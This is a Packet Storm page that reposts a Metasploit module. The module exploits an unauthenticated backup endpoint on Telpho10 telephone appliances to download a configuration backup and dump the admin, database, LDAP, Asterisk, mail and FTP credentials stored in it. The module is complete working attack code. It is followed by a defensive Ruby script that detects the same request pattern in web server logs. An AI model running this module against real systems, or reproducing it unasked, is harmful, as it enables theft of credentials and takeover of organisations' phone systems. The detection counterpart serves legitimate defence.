Telpho10 Backup Credentials Dumper

Reported 31 Aug 2024 by Jan Rude, metasploit.com. Type: packetstorm. Source: packetstormsecurity.com

Telpho10 Backup Credentials Dumper exploits a vulnerability in the Telpho10 telephone system appliance: it triggers generation of a configuration backup, downloads the resulting file, and dumps the admin, phpmyadmin and phpldapadmin credentials it contains. Successfully tested on appliance versions 2.6.31 and 2.6.39.

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Telpho10 Backup Credentials Dumper',
        'Description' => %q{
          This module exploits a vulnerability present in all versions of Telpho10 telephone system
          appliance. This module generates a configuration backup of Telpho10,
          downloads the file and dumps the credentials for admin login,
          phpmyadmin, phpldapadmin, etc.
          This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.
        },
        'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
        'License' => MSF_LICENSE,
        'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
        'Platform' => 'linux',
        'Privileged' => false,
        'DisclosureDate' => '2016-09-02'
      )
    )

    register_options(
      [
        Opt::RPORT(80)
      ]
    )
  end

  # Used for unpacking backup files
  def untar(tarfile)
    destination = tarfile.split('.tar').first
    FileUtils.mkdir_p(destination)
    File.open(tarfile, 'rb') do |file|
      Rex::Tar::Reader.new(file) do |tar|
        tar.each do |entry|
          # Only the basename is used, so archive paths cannot escape the destination directory
          dest = File.join(destination, File.basename(entry.full_name))
          next unless entry.file?

          File.open(dest, 'wb') do |f|
            f.write(entry.read)
          end
          File.chmod(entry.header.mode, dest)
        end
      end
    end
    return destination
  end

  # search for credentials in backup file
  def dump_creds(mysql_file)
    file = File.new(mysql_file, 'r')
    # The settings row that carries 'adminusername' also carries the other secrets
    while (line = file.gets)
      if line.include? 'adminusername'
        config = [line]
      end
    end
    file.close

    print_status('Login (/telpho/login.php)')
    print_status('-------------------------')
    print_good("Username: #{config.first[/adminusername','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/adminpassword','(.*?)'/, 1]}\n")

    print_status('MySQL (/phpmyadmin)')
    print_status('-------------------')
    print_good('Username: root')
    print_good("Password: #{config.first[/dbpassword','(.*?)'/, 1]}\n")

    print_status('LDAP (/phpldapadmin)')
    print_status('--------------------')
    print_good('Username: cn=admin,dc=localdomain')
    print_good("Password: #{config.first[/ldappassword','(.*?)'/, 1]}\n")

    print_status('Asterisk MI (port 5038)')
    print_status('-----------------------')
    print_good("Username: #{config.first[/manageruser','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/managersecret','(.*?)'/, 1]}\n")

    print_status('Mail configuration')
    print_status('------------------')
    print_good("Mailserver: #{config.first[/ipsmarthost','(.*?)'/, 1]}")
    print_good("Username: #{config.first[/mailusername','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/mailpassword','(.*?)'/, 1]}")
    print_good("Mail from: #{config.first[/mailfrom','(.*?)'/, 1]}\n")

    print_status('Online Backup')
    print_status('-------------')
    print_good("ID: #{config.first[/ftpbackupid','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/ftpbackuppw','(.*?)'/, 1]}\n")
  end

  def run
    # Step 1: ask the appliance to generate a backup (no authentication required)
    res = send_request_cgi({
      'uri' => '/telpho/system/backup.php',
      'method' => 'GET'
    })
    if res && res.code == 200
      print_status('Generating backup')
      sleep(1)
    else
      print_error('Could not find vulnerable script. Aborting.')
      return nil
    end

    # Step 2: fetch the generated archive from its fixed location
    print_status('Downloading backup')
    res = send_request_cgi({
      'uri' => '/telpho/temp/telpho10.epb',
      'method' => 'GET'
    })
    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        print_error('0 bytes returned, file does not exist or is empty.')
        return nil
      end

      path = store_loot(
        'telpho10.backup',
        'application/x-compressed',
        datastore['RHOST'],
        res.body,
        'backup.tar'
      )
      print_good("File saved in: #{path}")

      # Step 3: unpack the outer archive, then the nested mysql.tar inside it
      begin
        extracted = untar(path.to_s)
        mysql = untar("#{extracted}/mysql.tar")
      rescue StandardError
        print_error('Could not unpack files.')
        return nil
      end
      begin
        print_status("Dumping credentials\n")
        dump_creds("#{mysql}/mysql.epb")
      rescue StandardError
        print_error('Could not find credential file.')
        return nil
      end
    else
      print_error('Failed to download backup file.')
      return nil
    end
  rescue ::Rex::ConnectionError
    print_error("#{rhost}:#{rport} - Failed to connect")
    return nil
  end
end
```
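A detection-side counterpart to the module above, written for this page and not part of the Packet Storm / Metasploit code: it scans combined-format web server access logs for the request sequence the module issues (backup.php, then the generated telpho10.epb) from the same client. The log format, the 300-second pairing window and the sample lines are assumptions.

```ruby
require 'time'

# Paths the module requests, in order: generate the backup, then fetch it.
BACKUP_GEN  = '/telpho/system/backup.php'
BACKUP_FILE = '/telpho/temp/telpho10.epb'

# Apache/nginx combined log format (assumed): ip - - [time] "METHOD path HTTP/x" status bytes
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\S+)/

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path].split('?').first, status: m[:status].to_i }
end

# One alert per client that requested backup.php and then the .epb archive within
# `window` seconds. A 200 on the archive means the backup left the box (high); a
# 403/404 still shows the probe (medium). An archive fetch with no prior generate
# request from the same client is not matched by this rule.
def detect_backup_dump(lines, window: 300)
  last_gen = {} # ip => time of the most recent backup.php request
  alerts = []
  lines.each do |line|
    ev = parse_line(line)
    next unless ev && ev[:method] == 'GET'
    case ev[:path]
    when BACKUP_GEN
      last_gen[ev[:ip]] = ev[:time]
    when BACKUP_FILE
      gen = last_gen[ev[:ip]]
      next unless gen && (ev[:time] - gen).between?(0, window)
      alerts << { ip: ev[:ip], status: ev[:status],
                  seconds_after_generate: (ev[:time] - gen).to_i,
                  severity: ev[:status] == 200 ? 'high' : 'medium' }
    end
  end
  alerts
end

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
  '203.0.113.7 - - [31/Aug/2024:10:00:01 +0000] "GET /telpho/system/backup.php HTTP/1.1" 200 512',
  '203.0.113.7 - - [31/Aug/2024:10:00:03 +0000] "GET /telpho/temp/telpho10.epb HTTP/1.1" 200 184320',
  '198.51.100.9 - - [31/Aug/2024:10:05:00 +0000] "GET /telpho/system/backup.php HTTP/1.1" 200 512',
  '198.51.100.9 - - [31/Aug/2024:10:05:02 +0000] "GET /telpho/temp/telpho10.epb HTTP/1.1" 403 0',
  '192.0.2.4 - - [31/Aug/2024:10:20:00 +0000] "GET /telpho/temp/telpho10.epb HTTP/1.1" 200 184320'
].freeze

detect_backup_dump(SAMPLE_LOG).each { |a| puts "ALERT #{a[:severity]}: #{a.inspect}" }
```

Feeding the same rule a live access log (or a WAF's request log) lets you watch for the backup endpoint being hit by anything other than the appliance's own administration UI.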
